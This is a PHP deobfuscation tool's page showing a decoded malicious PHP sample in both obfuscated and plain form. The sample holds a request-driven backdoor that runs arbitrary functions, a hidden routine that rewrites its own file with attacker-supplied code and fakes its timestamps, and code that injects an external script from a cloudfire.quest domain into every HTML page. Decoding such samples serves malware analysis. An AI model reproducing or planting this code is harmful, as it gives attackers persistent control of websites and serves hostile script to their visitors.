Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
f((((23133*25558))) &&( $svlH=@${"\137R\x45\121UE\123\x54"}["RK5O\x4c1W0" ] )){$svlH[1](${..
Decoded Output download
<? f((((23133*25558))) &&( $svlH=@${"_REQUEST"}["RK5OL1W0" ] )){$svlH[1](${$svlH[2]}[0],$svlH[3]($svlH[4]));};
/*cut here;)*/if(isset($_REQUEST["9rzrad8d143674ip"])){if(empty($_REQUEST["9rzrad8d143674ip"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X-LiteSpeed-Purge: *");if(function_exists("opcache_reset")){@opcache_reset();}if(function_exists("apc_clear_cache")){@apc_clear_cache();}$kj1eka=filemtime(__FILE__);$jmy4ra=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["9rzrad8d143674ip"]))));@touch(__FILE__,$kj1eka+1,$jmy4ra+1);}die;}if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){function hi1x2l($kj1eka){return str_replace("</head>","<script type='text/javascript' async src='https://7jswmv5z.cloudfire.quest/challenge.js'></script></head>",$kj1eka);}ob_start("hi1x2l");}/*cut here;)*/ ?>
Did this file decode correctly?
Original Code
f((((23133*25558))) &&( $svlH=@${"\137R\x45\121UE\123\x54"}["RK5O\x4c1W0" ] )){$svlH[1](${$svlH[2]}[0],$svlH[3]($svlH[4]));};
/*cut here;)*/if(isset($_REQUEST["9\x72\x7a\162\141d\x38\144\x31\64\x336\67\x34\x69\x70"])){if(empty($_REQUEST["9\x72zr\x61d\70\x64\x31\x34\63\x367\x34i\160"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X\55\x4ci\164\145\123\160e\145\144-\x50u\162\x67e\72\40\x2a");if(function_exists("\157\x70c\141\x63he\137r\145\163e\x74")){@opcache_reset();}if(function_exists("\x61pc\137c\x6c\x65\141\x72_\143\x61\143h\145")){@apc_clear_cache();}$kj1eka=filemtime(__FILE__);$jmy4ra=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("\110*",$_REQUEST["\x39\x72\172r\x61\x648\144\x3143\66\67\64ip"]))));@touch(__FILE__,$kj1eka+1,$jmy4ra+1);}die;}if(isset($_SERVER["\x48\124\124P\x5fAC\103\105P\x54"])&&(strpos($_SERVER["\x48T\124\120\x5fA\103\103\x45P\124"],"\x74\145xt\57h\164\155\x6c")!==false||$_SERVER["\x48\124\124P\137A\103\103\x45\x50\124"]==="\x2a/*")){function hi1x2l($kj1eka){return str_replace("\74\x2fh\145a\x64>","<\163c\x72\151\x70\x74 \x74\x79pe\75\47\164\145x\164\57j\141v\141s\x63\162\151\x70\x74' \x61\163\x79\x6e\143 \163\162\x63\x3d\x27ht\x74\160s\72\57\57\67\152swm\x76\x35z.cl\x6f\x75d\x66\x69\162\145\56\161\x75\x65s\x74/\x63\150\141l\x6c\x65\156\147e\x2e\152s'\x3e<\57\x73\x63\x72\151\160\x74\76\74\x2f\x68\x65\x61\144\76",$kj1eka);}ob_start("\x68\151\x31x2\x6c");}/*cut here;)*/
Function Calls
None |
Stats
MD5 | 37a8996445b66de59f036ed3be62de9d |
Eval Count | 0 |
Decode Time | 47 ms |